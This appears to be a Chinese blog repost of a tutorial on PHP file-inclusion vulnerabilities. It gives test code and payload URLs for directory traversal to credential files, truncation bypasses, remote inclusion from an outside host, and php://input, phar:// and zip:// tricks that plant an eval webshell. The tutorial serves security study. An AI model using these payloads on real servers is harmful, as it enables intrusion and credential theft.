文件包含漏洞学习(3)

最新推荐文章于 2024-07-15 13:00:00 发布
最新推荐文章于 2024-07-15 13:00:00 发布
阅读量477 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: php 文件包含漏洞
原文链接:https://www.freebuf.com/news/182280.html
版权

文件包含漏洞学习(3)

我们看到这一段代码

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

这里函数后面又添加了.html为后缀,对于有限制的文件包含漏洞,我们可以通过一些方法来绕过,不过也有先决条件:magic_quotes_gpc = Off php版本<5.3.4

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-KIyNvIaW-1631894896662)(https://i.loli.net/2021/09/17/GyXrtQlxjqeIgwW.png)]

0x02本地文件包含漏洞

无限制本地文件包含漏洞

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试结果:

通过目录遍历漏洞可以获取到系统中其他文件的内容:

测试结果

常见的敏感信息路径:

Windows系统

c:\boot.ini // 查看系统版本

c:\windows\system32\inetsrv\MetaBase.xml // IIS配置文件

c:\windows\repair\sam // 存储Windows系统初次安装的密码

c:\ProgramFiles\mysql\my.ini // MySQL配置

c:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码

c:\windows\php.ini // php 配置信息

Linux/Unix系统

/etc/passwd // 账户信息

/etc/shadow // 账户密码文件

/usr/local/app/apache2/conf/httpd.conf // Apache2默认配置文件

/usr/local/app/apache2/conf/extra/httpd-vhost.conf // 虚拟网站配置

/usr/local/app/php5/lib/php.ini // PHP相关配置

/etc/httpd/conf/httpd.conf // Apache配置文件

/etc/my.conf // mysql 配置文件

session文件包含漏洞

利用条件:

session的存储位置可以获取。

\1. 通过phpinfo的信息可以获取到session的存储位置。

通过phpinfo的信息,获取到session.save_path为/var/lib/php/session:

获取到session的存储位置

\2. 通过猜测默认的session存放位置进行尝试。

如linux下默认存储在/var/lib/php/session目录下:

默认存储

session中的内容可以被控制,传入恶意代码。

示例:

<?phpsession_start();$ctfs=$_GET['ctfs'];$_SESSION["username"]=$ctfs;?>

漏洞分析

此php会将获取到的GET型ctfs变量的值存入到session中。

当访问http://www.ctfs-wiki/session.php?ctfs=ctfs 后,会在/var/lib/php/session目录下存储session的值。

session的文件名为sess_+sessionid,sessionid可以通过开发者模式获取。

通过开发者模式获取

所以session的文件名为sess_akp79gfiedh13ho11i6f3sm6s6。

到服务器的/var/lib/php/session目录下查看果然存在此文件,内容为:

username|s:4:"ctfs";[root@c21336db44d2 session]# cat sess_akp79gfiedh13ho11i6f3sm6s6username|s:4:"ctfs"

漏洞利用

通过上面的分析,可以知道ctfs传入的值会存储到session文件中,如果存在本地文件包含漏洞,就可以通过ctfs写入恶意代码到session文件中,然后通过文件包含漏洞执行此恶意代码getshell。

当访问http://www.ctfs-wiki/session.php?ctfs=<?php phpinfo();?>后,会在/var/lib/php/session目录下存储session的值。

[root@6da845537b27 session]# cat sess_83317220159fc31cd7023422f64bea1ausername|s:18:"<?php phpinfo();?>";

攻击者通过phpinfo()信息泄露或者猜测能获取到session存放的位置,文件名称通过开发者模式可获取到,然后通过文件包含的漏洞解析恶意代码getshell。

解析恶意代码getshell

有限制本地文件包含漏洞绕过

%00截断

条件:magic_quotes_gpc = Off php版本<5.3.4

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

测试结果:

http://www.ctfs-wiki.com/FI/FI.php?filename=../../../../../../../boot.ini%00

测试结果

路径长度截断

条件:windows OS,点号需要长于256;linux OS 长于4096

Windows下目录最大长度为256字节,超出的部分会被丢弃;

Linux下目录最大长度为4096字节,超出的部分会被丢弃。

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

http://www.ctfs-wiki.com/FI/FI.php?filename=test.txt/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

测试结果

点号截断

条件:windows OS,点号需要长于256

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename . ".html");
?>

EXP:

http://www.ctfs-wiki.com/FI/FI.php
?filename=test.txt.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

测试结果

0x03 远程文件包含漏洞

PHP的配置文件allow_url_fopen和allow_url_include设置为ON,include/require等包含函数可以加载远程文件,如果远程文件没经过严格的过滤,导致了执行恶意文件的代码,这就是远程文件包含漏洞。

allow_url_fopen = On(是否允许打开远程文件)

allow_url_include = On(是否允许include/require远程文件)

无限制远程文件包含漏洞

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试代码

通过远程文件包含漏洞,包含php.txt可以解析。

http://www.ctfs-wiki.com/FI/FI.php?filename=http://192.168.91.133/FI/php.txt

测试结果:

测试结果

有限制远程文件包含漏洞绕过

测试代码:

<?php include($_GET['filename'] . ".html"); ?>

代码中多添加了html后缀,导致远程包含的文件也会多一个html后缀。

测试代码

问号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt?

问号绕过

#号绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%23

#号绕过

还有哪些可以绕过?用burp跑一遍发现空格也可以绕过:

空格绕过

http://www.ctfs-wiki.com/FI/WFI.php?filename=http://192.168.91.133/FI/php.txt%20

空格绕过

0x04 PHP伪协议

PHP 带有很多内置 URL 风格的封装协议,可用于类似 fopen()、 copy()、 file_exists() 和 filesize() 的文件系统函数。 除了这些封装协议,还能通过 stream_wrapper_register() 来注册自定义的封装协议。

目录

目录

php:// 输入输出流

PHP 提供了一些杂项输入/输出(IO)流,允许访问 PHP 的输入输出流、标准输入输出和错误描述符, 内存中、磁盘备份的临时文件流以及可以操作其他读取写入文件资源的过滤器。

php://filter(本地磁盘文件进行读取)

元封装器,设计用于"数据流打开"时的"筛选过滤"应用,对本地磁盘文件进行读写。

用法:?filename=php://filter/convert.base64-encode/resource=xxx.php ?filename=php://filter/read=convert.base64-encode/resource=xxx.php 一样。

条件:只是读取,需要开启 allow_url_fopen,不需要开启 allow_url_include;

条件

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试代码

php://input

可以访问请求的原始数据的只读流。即可以直接读取到POST上没有经过解析的原始数据。 enctype=“multipart/form-data” 的时候 php://input 是无效的。

用法:?file=php://input 数据利用POST传过去。

php://input (读取POST数据)

碰到file_get_contents()就要想到用php://input绕过,因为php伪协议也是可以利用http协议的,即可以使用POST方式传数据,具体函数意义下一项;

测试代码:

<?php
    echo file_get_contents("php://input");
?>

测试结果:

测试结果

php://input(写入木马)

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.3.0),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行。

如果POST的数据是执行写入一句话木马的PHP代码,就会在当前目录下写入一个木马。

<?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?>

在当前目录下写入一个木马

测试结果:

测试结果

如果不开启allow_url_include会报错:报错信息

php://input(命令执行)

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

条件:php配置文件中需同时开启 allow_url_fopen 和 allow_url_include(PHP < 5.30),就可以造成任意代码执行,在这可以理解成远程文件包含漏洞(RFI),即POST过去PHP代码,即可执行;

POST过去PHP代码如果不开启allow_url_include会报错:

报错信息

file://伪协议 (读取文件内容)

通过file协议可以访问本地文件系统,读取到文件的内容

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试代码

data://伪协议

数据流封装器,和php://相似都是利用了流的概念,将原本的include的文件流重定向到了用户可控制的输入流中,简单来说就是执行文件的包含方法包含了你的输入流,通过你输入payload来实现目的; data://text/plain;base64,dGhlIHVzZXIgaXMgYWRtaW4

data://(读取文件)

和php伪协议的input类似,碰到file_get_contents()来用; <?php // 打印 "I love PHP" echo file_get_contents('data://text/plain;base64,SSBsb3ZlIFBIUAo='); ?>

注意:<span style="color: rgb(121, 121, 121);"><?php phpinfo();,这类执行代码最后没有?></span>闭合;

如果php.ini里的allow_url_include=On(PHP < 5.3.0),就可以造成任意代码执行,同理在这就可以理解成远程文件包含漏洞(RFI) 测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试结果

phar://伪协议

这个参数是就是php解压缩包的一个函数,不管后缀是什么,都会当做压缩包来解压。

用法:?file=phar://压缩包/内部文件 phar://xxx.png/shell.php 注意: PHP > =5.3.0 压缩包需要是zip协议压缩,rar不行,将木马文件压缩后,改为其他任意格式的文件都可以正常使用。 步骤: 写一个一句话木马文件shell.php,然后用zip协议压缩为shell.zip,然后将后缀改为png等其他格式。

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试结果

zip://伪协议

zip伪协议和phar协议类似,但是用法不一样。

用法:?file=zip://[压缩文件绝对路径]#[压缩文件内的子文件名] zip://xxx.png#shell.php。

条件: PHP > =5.3.0,注意在windows下测试要5.3.0<PHP<5.4 才可以 #在浏览器中要编码为%23,否则浏览器默认不会传输特殊字符。

测试代码:

<?php
    $filename  = $_GET['filename'];
    include($filename);
?>

测试结果

*本文作者:山东安云,转载请注明来自FreeBuf.COM

yyyyzzzllll
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613
qq_51577576的博客
10-06 684
[ vulhub漏洞复现篇 ] PHPmyadmin文件包含漏洞CVE-2018-12613 在4.8.2之前的phpMyAdmin 4.8.x中发现了一个问题,攻击者可以在其中包含(查看并可能执行)服务器上的文件。该漏洞来自页面重定向和在phpMyAdmin中加载的部分代码,以及对列入白名单的页面的不正确测试。除“ $ cfg [‘AllowArbitraryServer’] = true”情况(攻击者可以指定他/她已经控制的任何主机,并在phpMyAdmin上执行任意代码)外,攻击者还必须经过身份验证。
(转)GET来的漏洞
weixin_30823833的博客
08-19 565
转自呆子不开口在wooyun知识库的文章 0x00 前言 这篇文章主要讲目前互联网上get方法被不规范使用带来的一些安全漏洞。其中重点会讲get请求在账号登陆体系中被滥用的场景和攻击方式。 0x01 Get方法的定义 在客户机和服务器之间进行请求-响应时,两种最常被用到的方法是:GET 和 POST GET - 从指定的资源请求数据 POST - 向指定的资源提交要被处理的数...
PHP漏洞文件包含漏洞
dogeace的博客
11-28 1795
php语言中存在着下面几个函数存在文件包含的的功能,这些函数的本意是方便开发者及用户实现某些功能,但是如果不对文件包含的内容进行严格的的限定,会被攻击者恶意利用。这就是php文件包含漏洞。下面有四个函数可以实现文件包含分别是: 1.include();用此函数包含的时候,如果出现错误,会提出警告,跳过此步骤继续执行剩下的代码。 2.require();此函数文件包含出现错误的时候,终止程序的运行,与include()区别就是这里。 3.include_once()与1的唯一区别是文件只被包含一次,避免文
开发安全之:file_get_contents()漏洞利用
最新发布
A_991128a的博客
07-15 756
攻击者可以控制 file_get_contents() 文件系统路径参数,借此访问或修改原本受保护的文件。Details当满足以下两个条件时,就会产生 path manipulation 错误:1.攻击者能够指定某一文件系统操作中所使用的路径。2. 攻击者可以通过指定特定资源来获取某种权限,而这种权限在一般情况下是不可能获得的。例如,在某一程序中,攻击者可以获得特定的权限,以重写指定的文件或是在其控制的配置环境下运行程序。在这种情况下,攻击者可以指定通过。
Bugku WEB file_get_contents
qq_41696858的博客
07-17 1313
file_get_contents绕过: 解法1:?ac=bugku&fn=flag.txt 由于flag.txt里面内容就是bugku,当然可以绕过,当然,这属于投机取巧,不具有一般性 解法2:?ac=bugku&fn=php://input 在burp抓到数据包里的数据部分写上bugku,利用php://input伪协议进行绕过 解法3:?ac=bugku&fn=data://text/plain,bugku 利用data://text/plain伪协议进行绕过 data伪协议只
文件包含漏洞
MAPLE102424的博客
05-12 167
程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件, 而无需再次编写,这中文件调用的过程一般被称为文件包含。 程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用, 但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞
攻防世界-file_include
m0_49025459的博客
12-18 7229
对于我这种编码能力差的小白,我直接就是一个一个手测,然后呢,发现?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=check.php好使,但是没有flag。读题我们发现我们需要去读取./check.php中的数据,我们尝试用伪协议进行读取,接下来构造payload。文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。通过阅读php代码,我们明显的可以发现,这个一个文件包含的类型题。
web渗透之文件包含漏洞-学习笔记分享
weixin_52112965的博客
07-16 1139
文件包含知识的总结
ThinkCMF框架任意文件包含漏洞学习复现小记
Junior_Q的博客
10-10 1270
前言 跟随大佬学习,了解学习了ThinkCMF任意文件包含漏洞,并进行了一次渗透,下面来写个学习笔记记录一下 影响版本 ThinkCMF X1.6.0 ThinkCMF X2.1.0 ThinkCMF X2.2.0 ThinkCMF X2.2.1 ThinkCMF X2.2.2 漏洞危害 任何人在无需任何权限情况下,通过构造特定的请求包即可在远程服务器上执行任意代码。 实战 因为是学习,所以直接fofa语法搜索‘app=“ThinkCMF”’,虽然搜索出来很多,但找到一个确实有漏洞的还要花很长时间, 下面
【网络安全】文件包含漏洞--使用session进行文件包含
你在看屏幕的同时,屏幕也在注视着你
09-04 1330
使用session进行文件包含
jQuery $.get 的妙用 访问本地文本文件
12-08
场景: 当页面文件.html作为本地文件打开(即IE路径为file:///开头的)的时候,需要访问本地文本文件的内容时。 本地文件目录在页面文件的子文件夹。 目录结构 |-test.html |-Scripts |-data.txt 需要访问data.txt的内容。 代码: 代码如下: $.get(‘Scripts/data.txt’).success(function(content){ // content就为文件data.txt的文本内容了,注意txt文件的编码需要与html文件的编码一致,最好保存成utf-8 });
CG CTF-Web-file_get_contents
feng的博客
09-08 888
WP 进入环境后先发现什么都没有,我们f12查看源码,会发现代码,因此进行代码审计: <!--$file = $_GET['file']; if(@file_get_contents($file) == "meizijiu"){ echo $nctf; }--> 我们可以发现这题有一个file_get_contents函数。因为我们要get一个file,而且他的内容还要是meizijiu,我一开始想到了文件包含相关的内容,想到了php的一些伪协议。这时候我上网查file_get_con
PHP文件包含漏洞
Jim的博客
08-17 1313
PHP文件包含可以直接执行包含文件的代码,包含的文件格式是不受限制的。 文件包含分为本地文本包含(local file include)和远程文件包含(remote file include) 文件包含函数有:include(),include_once(),require()和require_once() 1.本地文件包含是指只能包含本机文件的包含漏洞,大多出现在模块加载,模板加载和ca
php $_SESSION含义,PHP的session概念与语法详细讲解 筋斗云网络
weixin_29414105的博客
03-17 577
cookie的工作流程由服务器发送给浏览器一个cookie(牌子)以后再访问时,由浏览器带着cookie(牌子),服务器检测cookie的信息如何设置cookie: setcookie()函数如何读取cookie: $_COOKIE[] 超级全局数组疑问?问: cookie由浏览器带着的,那么如何被篡改了,怎么办?比如:你买的奶酪,你把单据改成"蛋糕",如何防范?因为cookie是很容易被篡改或伪...
文件的相关操作
QAxiaoming的博客
09-15 701
1.写入文件 2.读取文件 以数组形式输出 循环输出带有汉字的文件 文件里边写输入文字 读取图片
[php_07]php文件系统
骑着代码去流浪
06-06 513
1.读取文件内容 PHP具有丰富的文件操作函数,最简单的读取文件的函数为file_get_contents,可以将整个文件全部读取到一个字符串中。 $content = file_get_contents('./test.txt'); file_get_contents也可以通过参数控制读取内容的开始点以及长度。 $content = file_get_contents('./test.t
PHP文件包含漏洞总结
坚持硬核
10-07 3385
首先,我们学习两个函数:require(string) include(string)这两个函数的作用是相同的, 就是将一个文件的内容包含在其所在的php代码中。 例如:我们写了一个1.txt文件放在服务器上,其内容为:<?php phpinfo()?> 当我们去请求这个页面的时候,自然而然,页面会原封不动的将这句话显示出来,那么有什么骚姿势可以让这句话作为php代码被解析呢? 嘿...
文件上传漏洞
qq_46263951的博客
05-15 275
环境下载:https://github.com/c0ny1/upload-labs 通关手册:https://xz.aliyun.com/t/2435 第三关若要成功访问.php3,则需要在Apache中添加语句,也可以添加其它任意扩展名,都执行.php程序 AddType application/x-httpd-php .php .php3 .php5 .php7 ...
文件上传漏洞详解:安全与对策
文件上传漏洞是网络安全中的一个常见问题,它可能导致各种危害,包括系统被植入后门、利用本地文件包含漏洞、攻击服务器端库、滥用服务器监控工具以及上传钓鱼页面、恶意文件或非法内容等。 **文件上传漏洞** 文件...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值